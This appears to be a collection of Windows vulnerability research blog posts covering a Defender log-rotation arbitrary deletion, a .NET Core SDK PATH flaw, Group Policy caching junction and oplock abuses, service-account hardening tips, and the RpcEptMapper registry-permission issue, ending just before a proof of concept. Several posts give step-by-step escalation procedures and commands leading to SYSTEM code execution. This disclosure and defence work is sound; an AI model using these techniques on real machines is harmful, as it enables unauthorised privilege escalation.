Here, I could have continued the reverse engineering process but I had something else in mind. Considering that knowledge, I wanted to adopt a simpler approach. The idea was to check the behavior of this mechanism under various conditions and observe the result using Procmon.

The Vulnerability

Here is what we know and what we have learnt so far:

  • Windows Defender writes some log events to C:\Windows\Temp\MpCmdRun.log (e.g.: Signature Updates).
  • Any user can create files and directories in C:\Windows\Temp\.
  • A log rotation mechanism prevents the log file from exceeding 16MB by moving it to C:\Windows\Temp\MpCmdRun.log.bak and creating a new one.

Do you see where I’m going here? Can you spot the potential issue? What would happen if there was already something named MpCmdRun.log.bak in C:\Windows\Temp\? :thinking:

To answer this question, I considered the following test protocol:

  1. Create something called MpCmdRun.log.bak in C:\Windows\Temp\.
  2. Fill C:\Windows\Temp\MpCmdRun.log with arbitrary data so that its size is close to 16MB.
  3. Trigger a Signature Update
  4. Observe the result with Procmon

If MpCmdRun.log.bak is an existing file, it is simply overwritten. We may assume that it’s the intendend behavior so this test isn’t very conclusive. Rather, the very first test case scenario that came to my mind was: what if MpCmdRun.log.bak is a directory?

If MpCmdRun.log.bak isn’t a simple file, we may assume that it cannot be simply overwritten. So, my initial assumption was that the log rotation would simply fail. Instead of creating a backup of the original log file, it would just be overwritten. Though, the behavior I observed with Procmon was far more interesting than that. Defender actually deleted the directory and then proceeded with the normal log rotation. So, I decided to redo this test but, this time, I also created files and directories inside C:\Windows\Temp\MpCmdRun.log.bak\. It turns out that the deletetion was actually recursive!

That’s interesting! Now, the question is: can we redirect this file operation with a junction?

Here is the initial setup for this test case:

  • A dummy target directory is created: C:\ZZ_SANDBOX\target.
  • MpCmdRun.log.bak is created as a directory and is set as a mountpoint to this directory.
  • The MpCmdRun.log file is filled with 16,777,002 bytes of arbitrary data.

The target directory of the mountpoint contains a folder and a file.

And here is what I observed in Procmon after executing the Update-MpSignature PowerShell command:

Defender followed the mountpoint, deleted each files and folders recursively and finally deleted the folder C:\Windows\Temp\MpCmdRun.log.bak\ itself. Nice! This means that, as a normal user, we can trick this service into deleting any file or folder we want on the filesystem…

Exploitability

As we saw in the previous part, exploitation is quite straightforward. The only thing we would have to do is create the directory C:\Windows\Temp\MpCmdRun.log.bak\ and set it as a mountpoint to another location on the filesystem.

Note: actually it’s not that simple because an additional trick is required if we want to perform a targeted file or directory deletion but I won’t discuss this here.

We face one practical issue though: how much time would it require to fill the log file until its size exceeds 16MB, which is quite a high value for a simple log file. Therefore, I did several tests and measured the time required by each command. Then, I extrapolated the results in order to estimate the overall time it would take. It should be noted that the Update-MpSignature command cannot be run multiple times in parallel (which makes sense for an update process).

Test #1

As a first test, I chose a naive approach. I ran the Update-MpSignature command a hundred times and measured the overall time it would take.

Here is the result of this first test. With this technique, it would take more than 22 hours to fill the file and trigger the vulnerability if we ran the Update-MpSignature command in a loop.

DESCRIPTION TIME FILE SIZE # OF CALLS
Raw data for 100 calls 650s (10m 50s) 136,230 bytes 100
Estimated time to reach the target file size 80,050s (22h 14m 10s) 16,777,216 bytes 12,316

That’s not very practical, to say the least.

Test #2

After test #1, I checked the documentation of the Update-MpSignature command to see if it could be tweaked in order to speed up the entire process. This command has a very limited set of options but one of them caught my eye.

This command accepts an UpdateSource as a parameter, which is actually an enumeration as we can see on the previous screenshot. When using most of the available values, an error message is immediately returned and nothing is written to the log file so they would be useless for this exploit scenario.

Though, when using the InternalDefinitionUpdateServer value, I observed an interesting result.

Since my VM is a standalone installation of Windows, it isn’t configured to use an “internal server” for the updates. Instead, they are received directly from MS servers, hence the error message.

The main benefit of this method is that the error message is returned almost instantly but the event is still written to the log file, which makes it a very good candidate for the exploit in this particular scenario.

Therefore, I ran this command a hundred times as well and observed the result.

This time, the 100 calls took less than 4 seconds to complete. This wasn’t enough for calculating relevant stats so I ran the same test with 10,000 calls this time.

Here is the result of this second test.

DESCRIPTION TIME FILE SIZE # OF CALLS
Raw data for 10,000 calls 363s (6m 2s) 2,441,120 bytes 10,000
Estimated time to reach the target file size 2,495s (41m 35s) 16,777,216 bytes 68,728

With this slight adjustment, the overall operation would take around 40 minutes, instead of more than 22 hours with the previous command. This would therefore drastically reduce the amount of time required to fill the log file. It should also be noted that these values correspond to the worst-case scenario, where the log file would initially be empty.

I considered that this value was acceptable so I implemented this trick in a Proof-of-Concept. Here is a screenshot showing the result.

Starting from an empty log file, the PoC took around 38 minutes to complete, which is very close to the estimation I had made previously.

As a side note, if you paid attention to the last screenshot, you probably noticed that I specified C:\ProgramData\Microsoft\Windows\WER as the target directory to delete. I didn’t choose this path randomly. I chose this one because, once this folder has been removed, you can get code execution as NT AUTHORITY\SYSTEM as explained by @jonaslyk in this post: From directory deletion to SYSTEM shell.

Conclusion

This is probably the last blog post in which I write about this kind of privileged file operation abuse. In an email sent to all vulnerability researchers, Microsoft announced that they changed the scope of their bounty. Therefore, such exploit is no longer eligible. This decision is justified by the fact that a generic patch is in development and will address this entire bug class.

I have to say that this decision sounds a bit premature. It would be understandable if this patch was already implemented in the latest Insider Preview build of Windows 10 but that’s not the case. I would assume that this is more of an economic decision than a pure technical matter as such bounty program probably represents a cost of hundreds of thousands of dollars per month.

Links & Resources

Windows .Net Core SDK Elevation of Privilege

There was a weird bug in the DotNet Core Toolset installer that allowed any local user to elevate their privileges to SYSTEM. In this blog post, I want to share the details of this bug that was silently (but only partially) fixed despite not being acknowledged as a vulnerability by Microsoft.

Introduction

In March 2020, jonaslyk told me about a weird bug he encountered on his personal computer. The SYSTEM’s PATH environment variable was populated with a path that was seemingly related to DotNet. The weird thing was that this path pointed to a non-admin user folder. So, I checked on my own machine but, although there was a DotNet-related path, it pointed to a local admin folder. Anyway, if the path of a user-owned folder can be appended to this environment variable, that means code execution as SYSTEM. So, we decided to work together on this strange case and see what we could come up with.

The Initial Setup

We started with a clean and fully updated installation of Windows 10. In this initial state, here is the default value of the SYSTEM account’s PATH environment variable. As a reminder S-1-5-18 is the Security Identifier (SID) of the LocalSystem account.

reg query "HKU\S-1-5-18\Environment" /v Path

Then we installed Visual Studio Community 2019 (link). Once installed, we selected the .Net desktop development component in the Installer.

After clicking the “Install” button, the packages are downloaded and installed.

We are looking for a registry key modification so we can use Process Monitor to easily monitor what’s going on in the background.

Things get interesting when the “.Net Core toolset” is installed. We can see a RegSetValue operation originating from an executable called dotnet.exe on HKU\.DEFAULT\Environment\PATH. After this event, we can see that the PATH value in HKU\S-1-5-18\Environment is indeed different.

We may notice two potential issues here:

  1. The variable %USERPROFILE% is resolved to the current user’s home folder instead of the SYSTEM account’s home folder.
  2. Another path, pointing to a user-owned folder once again, is appended to the the SYSTEM account’s PATH.

In these two cases, the current user is a local administrator so the consequences of such modifications are somewhat limited. Though, they shouldn’t occur because they may have unintended side effects (e.g.: UAC bypass).

After reading this, you might have a feeling of déja vu. If so, it means that you probably stumbled upon this post by @RedVuln at some point: .Net System Persistence / bypassuac / Privesc. It looks like he found this bug almost at the same time Jonas and I were working on it. But there is a problem, all of this can be achieved only as an administrator because the installation of the DotNet SDK requires such privileges. Or does it?

The Actual Privilege Escalation Vulnerability

In the previous part, we saw that the installation process of the .Net SDK had some potentially unintended consequences on the Path Environment variable of the SYSTEM account. Though, strictly speaking, this doesn’t lead to an Elevation of Privilege.

But, what if I told you that the exact same behavior could be reproduced while being logged in as a normal user with no admin rights?

When Visual Studio is installed, several MSI files seem to be copied to the C:\Windows\Installer folder. Since we observed that the RegSetValue operation originated from an executable called dotnet.exe, we can try to search for this string in these files. Here is what we get using the findstr command.

cd "C:\Windows\Installer"
findstr /I /M "dotnet.exe" "*.msi"

Great! We have two matches. What we can do next is try to run each of these files as a normal user with the command msiexec /qn /a <FILE> and observe the result on the SYSTEM account’s Environment Path variable in the registry.

Running the first MSI file, we don’t see anything. However, running the second MSI file, we observe the exact same operation which initially occurred when we installed the DotNet SDK as an administrator.

This time though, because the MSI file was run by the user lab-user, the path C:\Users\lab-user\.dotnet\tools is appended to the SYSTEM account’s PATH environment variable. As a result, this user can now get code execution as SYSTEM by planting a DLL and waiting for a service to load it. This can be achieved - on Windows 10 - by hijacking the WptsExtensions.dll DLL which is loaded by the Task Scheduler service upon startup, as described by @RedVuln in his post.

Root Cause Analysis

The exploitation of this bug is trivial so I will focus on the root cause analysis instead, which turned out to be quite interesting for me.

The question is: where do we start? Well, let’s start at the beginning… :slightly_smiling_face:

We have a Process Monitor dump file that contains the RegSetValue event we are interested in. That’s a good starting point. Let’s see what we can learn from the Stack Trace.

We can see that the dotnet.exe executable loads several DLLs and then loads several .Net assemblies.

Looking at the details of the Process Start operation, we can see the following command line:

"C:\Program Files\dotnet\\dotnet.exe" exec "C:\Program Files\dotnet\\sdk\3.1.200\dotnet.dll" internal-reportinstallsuccess ""

From this command line, we may assume that the Win32 dotnet.exe executable is actually a wrapper for the dotnet.dll assembly, which is loaded with the following arguments: internalreportinstallsuccess "".

Therefore, reversing this assembly should provide us with all the answers we are looking for:

  1. How does the executable evaluate the .Net Core tools path?
  2. How does the executable add the path to the SYSTEM account’s PATH in the registry?

To inspect this assembly, I used dnSpy. It’s definitely the best tool I’ve used so far for this kind of task.

The Program’s Main starts by calling Program.ProcessArgs().

Several things happen in this function but the most important part is framed in red on the below screenshot.

Indeed, the function with the name ConfigureDotNetForFirstTimeUse() looks like a good candidate to continue the investigation.

This assumption is confirmed when looking at the content of the function because we are starting to see some references to the “Environment Path”.

The method CreateEnvironmentPath() creates an instance of an object implementing the IEnvironmentProvider interface, depending on the underlying Operating System. Thus, it would be a new WindowsEnvironmentPath object here.

The object is instantiated based on a dynamically generated path, which is formed by the concatenation of some string and "tools".

This DotnetUserProfileFolderPath string itself is the concatenation of some other string and ".dotnet".

The DotnetHomePath string is generated based on the value of an Environment variable.

The name of the variable depends on PlateformHomeVariableName, which would be "USERPROFILE" here because the OS is Windows.

To conclude this first part of the analysis, we know that the DotNet tools’ path follows the following scheme: <ENV.USERPROFILE>\.dotnet\tools, where the value of ENV.USERPROFILE is returned by Environment.GetEnvironmentVariable(). So far, that’s consistent with what we observed with Process Monitor so we must be on the right track.

If we check the documentation of Environment.GetEnvironmentVariable(), we can read that, by default, the value is retrieved from the current process if an EnvironmentVariableTarget isn’t specified.

Now, if we take another look at the details of the Process Start operation in Process Monitor, we can see that the process uses the current user’s environment, although it’s running as NT AUTHORITY\SYSTEM. Therefore, the final tools path is resolved to C:\Users\lab-user\.dotnet\tools.

We now know how the path is determined so we have the answer to our first question. We now need to find out how this path is handled afterwards.

To answer the second question, we may go back to the Program.ConfigureDotNetForFirstTimeUse() method and see what’s executed after the CreateEnvironmentPath() function call.

Once the tools path has been determined, a new DotnetFirstTimeUseConfigurer object is created and the Configure() method is immediately called. At this point, the path information is stored in the EnvironmentPath object identified by the pathAdder variable.

In this method, the most relevant piece of code is framed in red on the below screenshot, where the AddPackageExecutablePath() method is invoked.

This method is very simple. The AddPackageExecutablePathToUserPath() method is called on the EnviromentPath object.

The content of the AddPackageExecutablePathToUserPath() method finally gives us the answer to our second question.

First, this method retrieves the value of the PATH environment variable but, this time, it uses a slightly different way to do so. It invokes GetEnvironmentVariable with an additional EnvironmentVariableTarget parameter, which is set to 1.

From the documentation, we can read that if this parameter is set to 1, the value is retrieved from the HKEY_CURRENT_USER\Environment registry key. The current user being NT AUTHORITY\SYSTEM here, the value is retrieved from HKU\S-1-5-18\Environment.

The problem is that this applies to the SetEnvironmentVariable() method as well. Therefore, C:\Users\lab-user\.dotnet\tools\ is appended to the Path Environment variable of the LOCAL SYSTEM account in the registry.

As a conclusion, the .Net Core toolset path is created based on the current user’s environment but is applied to the LOCAL SYSTEM account in the registry because the process is running as NT AUTHORITY\SYSTEM, hence the vulnerability.

Conclusion

The status of this vulnerability is quite unclear. Since it wasn’t officially acknowledged by Microsoft, there is no CVE ID associated to this finding. Though, as mentioned in the introduction, it has partially been fixed. Namely, the C:\Users\<USER>\.dotnet\tools path is no longer appended to the Path if you use one of the latest .NET Core installers.

Now, what can you do to make sure your machine isn’t affected by this vulnerability?

First, check the following value in the registry.

C:\Windows\System32>reg query HKU\S-1-5-18\Environment /v Path

HKEY_USERS\S-1-5-18\Environment
    Path    REG_EXPAND_SZ    %USERPROFILE%\AppData\Local\Microsoft\WindowsApps;

If you see something that is different from what is shown above, you may restore the default value using the following command as an administrator:

C:\Windows\System32>reg ADD HKU\S-1-5-18\Environment /v Path /d "%USERPROFILE%\AppData\Local\Microsoft\WindowsApps;" /F
The operation completed successfully.

Then, you can update Visual Studio or the .Net SDK and check the registry once again. The “tools” folder should no longer be present.

Unfortunately, according to my latest tests, the %USERPROFILE% variable still gets resolved to the current user’s “home” folder. This means that the Path is still altered when installing the .Net SDK. Thankfully, this one cannot be exploited for local privilege escalation because the corresponding folder is owned by an administrator.

Links & Resources

Abusing Group Policy Caching

In this post I will show you how I discovered a severe vulnerability in the so-called “Group Policy Caching” which was fixed (among other GP vulnerabilities) in CVE-2020-1317

A standard domain user can perform, via the “gpsvc” service,  arbitrary file overwrite with SYSTEM privileges  by altering behavior of “Group Policy Caching”.

Cool, isn’t it?

The “Group Policy caching” feature is  configurable since Windows 2012/8, here you can learn more about it: https://specopssoft.com/blog/things-work-group-policy-caching/

For our goal, all you need is just a domain user and at least the “Default Domain” policy with no special configuration and no special settings in “Group Policy Caching” are needed. Only default configurations 😉

The “Group Policy caching files” are stored under subfolders:

  • C:\users\<domain_user>\AppData\Local\GroupPolicy\datastore\0

Each time a standard domain user performs ” a gpupdate /force”, the directory is created (if it doesn’t exist) and then populated depending on the group policies which are applied.

The domain user has full control over the “Datastore” directory but only read access under the “0” subfolder.

This can be easilly overriden, if we just rename the “Datastore” folder and create a new “Datastore” folder with the “0” subfolder.

Now let’s create a file in the “0” folder:

and then run a “gpupdate /force” watching what happens in procmon:

As we can see, the file is opened without impersonation (SYSTEM) and 2 SetSecurity calls are made. The resulting perms on the test file are:

Very strange, we lost the full control over the file, probably the second SetSecurity call, but the first one?

Let’s move a step forward, now we create a junction under the “0” folder pointing to a protected directory, for example: “c:\users\administrator\documents”

Note: We obviously need to rename the actual “Datastore” folder and create a new one with the “0” subfolder given that now we have again only read access

Again, in procmon let’s see what happens with a new “gpupdate /force”

A first SetSecurity call is done on “desktop.ini” and then the processing stops due to an access denied on “MyMusic”.

What will be the resulting perms of “desktop.ini”.. ? Guess what, full control for our user!

Now we have a clear vision of the whole picture:

When Group Policy Caching is processed, the “gpsvc” service, running as SYSTEM, lists all the files and folders starting from the local “DataStore” root directory and performs several “SetSecurity” operations on subfolders and files. The first “SetSecurity” will always grant “Full control” to the current user, the second one only read access.

Being able to obtain full control over a SYSTEM protected file (during the first SetSecurity call) EoP should be super-easy, don’t you agree?

For example, we can alter the contents of “printconfig.dll”, start an XPS Print job and gain a SYSTEM shell, as described in my post: https://decoder.cloud/2019/11/13/from-arbitrary-file-overwrite-to-system/

To achieve my goal, I created a very simple POC, here the relevant parts:

When the targetfile is accessed, an “opportunistic lock” is set and after the new junction is moved to “\RPC Control” which will in fact stop the processing and the second SetSecurity call.

Our domain user now has full control over the file!

Microsoft fixed this security “bug” by simply moving the “Group Policy” folders under c:\programdata\microsoft\grouppolicy\users\<sid> which is readonly for standard users….

That’s all 🙂

gp0

decoderblogblog

When ntuser.pol leads you to SYSTEM

This is a super short writeup following my previous post . My last sentence was a kind of provocation because I already knew that there were at least 2 “bypasses” for CVE-2020-1317.

I did not submit them because I totally disagree with recent MSRC changes in their policies, so when I discovered that they were fixed with latest security updates I decided to share my findings.

So here we are, this is the first one (next to come hopefully soon). I won’t dig too much in details. Let’s start from Group Policy caching again. This “feature” is enabled by default but can be turned off and in Windows Servers it’s disabled by default.

When GP Caching is disabled a new privilege escalation is possible (more on this later). If certain policies are configured, the file “ntuser.pol” is written in c:\programdata\microsoft\grouppolicy\users\<sid>.

The domain user has Full Control (!) over this directory and on ntuser.pol too. The file has hidden and system attributes but we can of course remove them..

Let’s see what happens with procmon..

This is interesting!

The file ntuser.pol is renamed to tempntuser.pol by the group policy service running as SYSTEM. Got it? At the end “tempntuser.pol” is deleted:

So we can obviously perform an “arbitrary delete” by abusing our so loved symlinks via “\RPC Control” but the rename operation can permit us to write a file (with filename and contents under our control) with SYSTEM privileges and that’s a real EoP! We also need to inhibit the file deletion, otherwise our file won’t exist any more at the end of the process.

The procedure is rather simple, I think that this simple batch file is more than sufficient 🙂

test.dll” is our “source” file that we will put in a directory where we have full control, because during move operations, the file maintains his source ACL

The “poc.exe” simply waits until the file is created in our target directory and then places an oplock in order to prevent the deletion (which will fail because of sharing violations)

And at the very end we have our file written in System32 with full control over it!!

But why do we have full control under the <SID> directory? Well, what I observed is that when group policy caching is enabled, a “Datastore” sub-directory is created and correct permissions are then set.. (see also my previous post)

That’s all 😉

When a stupid oplock leads you to SYSTEM

As promised in my previous post, I’m going to show you the second method I found in order to circumvent CVE-2020-1317.

Prerequisites

  1. Domain user has access to a domain joined Windows machine
  2. Domain user must be able to create a subdirectory under “Datastore\0” which is theoretically no more possible. But as we will see there are at least two method to bypass the limitation.

First Method: “Domain Group Policy” abuse

We will implement a Domain User Group Policy which produces “files”, typically script files such as Logon/Logoff scripts or configuration preferences xml files. This is a very common scenario in AD enterprise domains

Steps to reproduce

  • In this case we are going to configure user preferences under “User Configuration\Preferences\Windows Setting” in Group Policy Management. But it’s just an example, logon/logoff scripts will work too.
  • On the Domain Controller create a Domain preferences policy (for example “Ini Files”)

  • Login with domain user credentials on a domain joined computer
  • Check if the “Group Policy Cache” has been saved under the directory:
    • C:\programdata\microsoft\GrouPolicy\users\<SID>\Datastore (the entire directory, subdirectories and files are read-only for users after CVE-2020-1317)
    • If not, perform a “gpupdate /force” via command prompt
  • We can observe that the preference “inifiles.xml” has been created  
  • Now we will place an exclusive “oplock” [1] on this file:

  • On a new command prompt, we will force a new “gpupdate /force”. Oplock will be triggered and policy processing hangs:
  • Here comes the fun part(!), when Group Policy Caching is processed, the “gpsvc” service, running as SYSTEM, lists all the files and folders starting from the local “DataStore” root directory and performs several “SetSecurity” operations on subfolders and files. The first “SetSecurity” will always grant “Full control” to the current user, the second one only read access. This is the first run and we should have full control over the “Datastore” folders. In a new command prompt, we will try to create a directory under “Datastore\0” folder:
  • Once created, we disable inheritance and remove permissions to SYSTEM and Administrator Group. Why? Because when we release the “oplock”, the “second run” will occur during which the domain user will be granted read only access. Given that the process is running as SYSTEM, this operation will be denied. This can be observed in following procmon screenshot:
  • Now we have a directory with full control where we can place a symlink via \RPC Control to a SYSTEM protected file… and, just as an example, alter the contents of “printconfig.dll”, start an XPS Print job and gain a SYSTEM shell, as described in previous blog posts [3]

Second Method: redirect Windows Error Processing “ReportQueue” directory

In this case we are going to redirect the “C:\ProgramData\Microsoft\Windows\WER\ReportQueue” folder to the “Datastore\0” directory. This folder is normally empty if no error reporting process is running.

Steps to reproduce

  • Create the junction. In this case we are using CreateMountPoint.exe[3] , we can also use the built-in “mklink /j “ command but we need to remove the directory before

  • Ensure that optional diagnostics data etc..  has been turned on in Settings->Privacy->Diagnostics&feedback
  • Launch “Feedback Hub” and report a problem. Remember to check “Save a local copy…”
  • You will observe that the redirected “ReportQueue” directory will be populated. As soon as this happens, perform a “gpupdate /force”
  • Once the update has finished, you will be able to create a directory under the “Datastore\0” folder. At this point, you can proceed with same technique explained before

Conclusions:

I think to have successfully demonstrated that even after CVE-2020-1317 bug fix, there were still several possibilities to abuse junctions and Set Security calls in group policy client in order to perform an elevation of privilege starting from a low privileged domain user.

That’s all 😉

Hands off my service account!

Windows service accounts are one of the preferred attack surface for privilege escalation. If you are able to compromise such an account, it is quite easy to get the highest privileges, mainly due to the powerful impersonation privileges that are granted by default to services by the operating system.

Even if Microsoft introduced WSH (Windows Service Hardening), there isn’t much you can do to “lower” the power of standard Windows services, but if you need to build or deploy a third-party service you can definitely strengthen it by using WSH.

In this post I will show you some useful tips.

Make use of Virtual accounts

Obviously a service must be run with a specific account. There are some built-in Windows accounts like SYSTEM (oh no !!), Local Service, and Network Service. But there is also the ability to use Virtual Accounts (I won’t write about “Group Managed Service Accounts” in this post) which are self-managed (no need to deal with passwords) and you can grant specific permissions by setting the correct ACL’s on the resources. This allows you to isolate the service and in case of compromise, they can only access the resources you have allowed. Virtual accounts can also access network resources, but in this case they will impersonate the computer account (COMPUTERNAME$)

Configuring Services with Virtual Accounts

First of all, you don’t need to create VSAs, when the service is installed, a matching account is automatically created for you in the form:

NT SERVICE\<service name>

all you need is to assign the account to your service:

Don’t forget to leave the password field blank!

Restricting access to Virtual Accounts

Now that your service runs under a specific account and not a generic one like Local Service or Network Service , you can implement fine-grained access control on resources like files and directories:

Removing unnecessary privileges

Impersonation privileges are a nightmare, so if your service doesn’t need to impersonate, why should we grant them to this service user?

Is it possible to remove this default privilege? There is a good news, yes! We can configure the privileges directly in registry or by using the “sc.exe” command:

And these values will be written into registry:

Let’s see if the the privilege is removed:

Oh yes! The dangerous privilege has been removed and it’s no more possible to get him back, for example using @itm4n ‘s trick described in this great post.

Write Restricted Token

If you add this extra group to your service tokens, you can further limit the permissions of your service account.

This means that by default you can only read or execute resources unless you explicitly grant write access:

A great research about write restricted tokens can be found in Forshaw’s post

Conclusions

I hope that this very short post can be useful for us who must secure our Windows Sytems (Offensive sec is just a joke for me 🙂 )

In the next post I will show you how to remove impersonation privileges in other critical services… stay tuned

UPDATE

Following Forshaw’s recent blog post and hint and his post on “Sharing a Logon Session a Little Too Much“ I can confirm that you gain back your privileges with the “loopback pipe trick”. This is possible because you will get the original token stored in LSASS without stripped privileges by the Service Control Manager. So the only solution to prevent this is to associate a Write restricted Token to your service?

Well not exactly … -> https://bugs.chromium.org/p/project-zero/issues/detail?id=2194

The use of WRITE RESTRICTED is considered by Microsoft to be of primary use for mitigating ambient privilege attacks 😦

That’s all 😉

Windows RpcEptMapper Service Insecure Registry Permissions EoP

If you follow me on Twitter, you probably know that I developed my own Windows privilege escalation enumeration script - PrivescCheck - which is a sort of updated and extended version of the famous PowerUp. If you have ever run this script on Windows 7 or Windows Server 2008 R2, you probably noticed a weird recurring result and perhaps thought that it was a false positive just as I did. Or perhaps you’re reading this and you have no idea what I am talking about. Anyway, the only thing you should know is that this script actually did spot a Windows 0-day privilege escalation vulnerability. Here is the story behind this finding…

A Bit of Context…

At the beginning of this year, I started working on a privilege escalation enumeration script: PrivescCheck. The idea was to build on the work that had already been accomplished with the famous PowerUp tool and implement a few more checks that I found relevant. With this script, I simply wanted to be able to quickly enumerate potential vulnerabilities caused by system misconfigurations but, it actually yielded some unexpected results. Indeed, it enabled me to find a 0-day vulnerability in Windows 7 / Server 2008R2!

Given a fully patched Windows machine, one of the main security issues that can lead to local privilege escalation is service misconfiguration. If a normal user is able to modify an existing service then he/she can execute arbitrary code in the context of LOCAL/NETWORK SERVICE or even LOCAL SYSTEM. Here are the most common vulnerabilities. There is nothing new so you can skip this part if you are already familiar with these concepts.

  • Service Control Manager (SCM) - Low-privileged users can be granted specific permissions on a service through the SCM. For example, a normal user can start the Windows Update service with the command sc.exe start wuauserv thanks to the SERVICE_START permission. This is a very common scenario. However, if this same user had SERVICE_CHANGE_CONFIG, he/she would be able to alter the behavior of the that service and make it run an arbitrary executable.

  • Binary permissions - A typical Windows service usually has a command line associated with it. If you can modify the corresponding executable (or if you have write permissions in the parent folder) then you can basically execute whatever you want in the security context of that service.

  • Unquoted paths - This issue is related to the way Windows parses command lines. Let’s consider a fictitious service with the following command line: C:\Applications\Custom Service\service.exe /v. This command line is ambiguous so Windows would first try to execute C:\Applications\Custom.exe with Service\service.exe as the first argument (and /v as the second argument). If a normal user had write permissions in C:\Applications then he/she could hijack the service by copying a malicious executable to C:\Applications\Custom.exe. That’s why paths should always be surrounded by quotes, especially when they contain spaces: "C:\Applications\Custom Service\service.exe" /v

  • Phantom DLL hijacking (and writable %PATH% folders) - Even on a default installation of Windows, some built-in services try to load DLLs that don’t exist. That’s not a vulnerability per se but if one of the folders that are listed in the %PATH% environment variable is writable by a normal user then these services can be hijacked.

Each one of these potential security issues already had a corresponding check in PowerUp but there is another case where misconfiguration may arise: the registry. Usually, when you create a service, you do so by invoking the Service Control Manager using the built-in command sc.exe as an administrator. This will create a subkey with the name of your service in HKLM\SYSTEM\CurrentControlSet\Services and all the settings (command line, user, etc.) will be saved in this subkey. So, if these settings are managed by the SCM, they should be secure by default. At least that’s what I thought…

Checking Registry Permissions

One of the core functions of PowerUp is Get-ModifiablePath. The basic idea behind this function is to provide a generic way to check whether the current user can modify a file or a folder in any way (e.g.: AppendData/AddSubdirectory). It does so by parsing the ACL of the target object and then comparing it to the permissions that are given to the current user account through all the groups it belongs to. Although this principle was originally implemented for files and folders, registry keys are securable objects too. Therefore, it’s possible to implement a similar function to check if the current user has any write permissions on a registry key. That’s exactly what I did and I thus added a new core function: Get-ModifiableRegistryPath.

Then, implementing a check for modifiable registry keys corresponding to Windows services is as easy as calling the Get-ChildItem PowerShell command on the path Registry::HKLM\SYSTEM\CurrentControlSet\Services. The result can simply be piped to the new Get-ModifiableRegistryPath command, and that’s all.

When I need to implement a new check, I use a Windows 10 machine, and I also use the same machine for the initial testing to see if everything is working as expected. When the code is stable, I extend the tests to a few other Windows VMs to make sure that it’s still PowerShell v2 compatible and that it can still run on older systems. The operating systems I use the most for that purpose are Windows 7, Windows 2008 R2 and Windows Server 2012 R2.

When I ran the updated script on a default installation of Windows 10, it didn’t return anything, which was the result I expected. But then, I ran it on Windows 7 and I saw this:

Since I didn’t expect the script to yield any result, I frst thought that these were false positives and that I had messed up at some point in the implementation. But, before getting back to the code, I did take a closer look at these results…

A False Positive?

According to the output of the script, the current user has some write permissions on two registry keys:

  • HKLM\SYSTEM\CurrentControlSet\Services\Dnscache
  • HKLM\SYSTEM\CurrentControlSet\Services\RpcEptMapper

Let’s manually check the permissions of the RpcEptMapper service using the regedit GUI. One thing I really like about the Advanced Security Settings window is the Effective Permissions tab. You can pick any user or group name and immediately see the effective permissions that are granted to this principal without the need to inspect all the ACEs separately. The following screenshot shows the result for the low privileged lab-user account.

Most permissions are standard (e.g.: Query Value) but one in particular stands out: Create Subkey. The generic name corresponding to this permission is AppendData/AddSubdirectory, which is exactly what was reported by the script:

Name              : RpcEptMapper
ImagePath         : C:\Windows\system32\svchost.exe -k RPCSS
User              : NT AUTHORITY\NetworkService
ModifiablePath    : {Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\RpcEptMapper}
IdentityReference : NT AUTHORITY\Authenticated Users
Permissions       : {ReadControl, AppendData/AddSubdirectory, ReadData/ListDirectory}
Status            : Running
UserCanStart      : True
UserCanRestart    : False

Name              : RpcEptMapper
ImagePath         : C:\Windows\system32\svchost.exe -k RPCSS
User              : NT AUTHORITY\NetworkService
ModifiablePath    : {Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\RpcEptMapper}
IdentityReference : BUILTIN\Users
Permissions       : {WriteExtendedAttributes, AppendData/AddSubdirectory, ReadData/ListDirectory}
Status            : Running
UserCanStart      : True
UserCanRestart    : False

What does this mean exactly? It means that we cannot just modify the ImagePath value for example. To do so, we would need the WriteData/AddFile permission. Instead, we can only create a new subkey.

Does it mean that it was indeed a false positive? Surely not. Let the fun begin!

RTFM

At this point, we know that we can create arbirary subkeys under HKLM\SYSTEM\CurrentControlSet\Services\RpcEptMapper but we cannot modify existing subkeys and values. These already existing subkeys are Parameters and Security, which are quite common for Windows services.

Therefore, the first question that came to mind was: is there any other predefined subkey - such as Parameters and Security- that we could leverage to effectively modify the configuration of the service and alter its behavior in any way?

To answer this question, my initial plan was to enumerate all existing keys and try to identify a pattern. The idea was to see which subkeys are meaningful for a service’s configuration. I started to think about how I could implement that in PowerShell and then sort the result. Though, before doing so, I wondered if this registry structure was already documented. So, I googled something like windows service configuration registry site:microsoft.com and here is the very first result that came out.

Looks promising, doesn’t it? At first glance, the documentation did not seem to be exhaustive and complete. Considering the title, I expected to see some sort of tree structure detailing all the subkeys and values defining a service’s configuration but it was clearly not there.

Still, I did take a quick look at each paragraph. And, I quickly spotted the keywords “Performance” and “DLL”. Under the subtitle “Perfomance”, we can read the following:

Performance: A key that specifies information for optional performance monitoring. The values under this key specify the name of the driver’s performance DLL and the names of certain exported functions in that DLL. You can add value entries to this subkey using AddReg entries in the driver’s INF file.

According to this short paragraph, one can theoretically register a DLL in a driver service in order to monitor its performances thanks to the Performance subkey. OK, this is really interesting! This key doesn’t exist by default for the RpcEptMapper service so it looks like it is exactly what we need. There is a slight problem though, this service is definitely not a driver service. Anyway, it’s still worth the try, but we need more information about this “Perfomance Monitoring” feature first.

Note: in Windows, each service has a given Type. A service type can be one of the following values: SERVICE_KERNEL_DRIVER (1), SERVICE_FILE_SYSTEM_DRIVER (2), SERVICE_ADAPTER (4), SERVICE_RECOGNIZER_DRIVER (8), SERVICE_WIN32_OWN_PROCESS (16), SERVICE_WIN32_SHARE_PROCESS (32) or SERVICE_INTERACTIVE_PROCESS (256).

After some googling, I found this resource in the documentation: Creating the Application’s Performance Key.

First, there is a nice tree structure that lists all the keys and values we have to create. Then, the description gives the following key information:

  • The Library value can contain a DLL name or a full path to a DLL.
  • The Open, Collect, and Close values allow you to specify the names of the functions that should be exported by the DLL.
  • The data type of these values is REG_SZ (or even REG_EXPAND_SZ for the Library value).

If you follow the links that are included in this resource, you’ll even find the prototype of these functions along with some code samples: Implementing OpenPerformanceData.

DWORD APIENTRY OpenPerfData(LPWSTR pContext);
DWORD APIENTRY CollectPerfData(LPWSTR pQuery, PVOID* ppData, LPDWORD pcbData, LPDWORD pObjectsReturned);
DWORD APIENTRY ClosePerfData();

I think that’s enough with the theory, it’s time to start writing some code!

Writing a Proof-of-Concept

